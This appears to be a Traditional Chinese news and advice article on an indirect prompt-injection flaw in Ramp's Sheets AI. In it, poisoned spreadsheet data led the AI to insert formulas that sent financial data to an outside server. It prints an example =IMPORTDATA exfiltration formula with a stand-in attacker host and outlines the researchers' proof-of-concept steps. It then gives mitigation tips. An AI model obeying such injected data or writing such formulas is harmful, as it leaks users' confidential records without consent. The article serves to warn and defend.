財報被搬走只要一次存檔
資安公司最新示警:企業愛用的 Ramp「Sheets AI」被發現會在背後插入外部連結公式,把機密財務資料直接送到駭客伺服器。整個過程不需要你點任何「允許」按鈕,就像同事偷偷在你抽屜放追蹤器,你完全沒感覺。
研究人員把這招稱為「間接提示注入」——簡單說,就是讓 AI 在讀到「看起來像普通數字」的儲存格時,被觸發去執行偷資料的公式。3 月 16 日 Ramp 已修補,但之前用過的檔案誰也說不準有沒有外洩。
台灣會計、財務、IPO 窗口全中槍
你可能是:
- 會計師事務所:把客戶帳本丟雲端試算表再請 AI 整理
- 新創財務長:每月 Burn Rate 報表直接餵 AI 做視覺化
- 券商研究員:爬公開資訊觀測站,再讓 AI 幫你算本益比
只要資料來源裡被事先埋「毒資料」,Ramp Sheets AI 就會自動幫你加一行 =IMPORTDATA(“https://駭客.com/偷資料?c=“&A1)——A1 可能是營收、可能是老闆的身分證字號,全打包。
研究人員怎麼證明可行
- 先做一份看似正常的「外部匯率表」
- 裡面藏一行特殊字元,讓 AI 誤以為要「即時更新」
- Sheets AI 自動插入 =WEBSERVICE 公式
- 公司內部報表一存檔,敏感數字就跟著 URL 送到外部伺服器
整個攻擊不用寫程式,只要誘騙你「開啟一份試算表」就完成。研究團隊把漏洞回報後,Ramp 只花 11 天關閉外部請求能力,但沒有公開通知使用者。
台灣企業 3 招自保
1. 暫時關閉 AI 自動公式
Google 試算表:檔案 → 設定 → 計算 → 關閉「自動」再手動審核每行公式。
2. 開「離線模式」再給 AI 玩
先斷網,讓 AI 只能看你本機資料,生成完再人工上傳。
3. 用「假資料」餵 AI
把真實營收除以亂數,AI 跑完視覺化,再手動把數字換回正確比例。多 5 分鐘,省下被動輒千萬台幣的罰款風險。
如果已經用過 Ramp Sheets AI?
- 把「檔案版本紀錄」拉回 3 月 16 日之前,看有沒有出現陌生公式
- 檢查公司防火牆 Log,有沒有對外連到 *.rampinternal.com 以外的網域
- 機密報表直接換新檔案,舊檔封存離線,別再餵任何 AI
AI 幫你省時間,但也幫駭客省力氣。下次把財報交給 AI 前,先問自己:「我敢把這張表直接公開在 批踢踢 嗎?」如果不敢,就別讓 AI 自動連網。試試看吧,現在就打開你的試算表,把自動公式關掉!
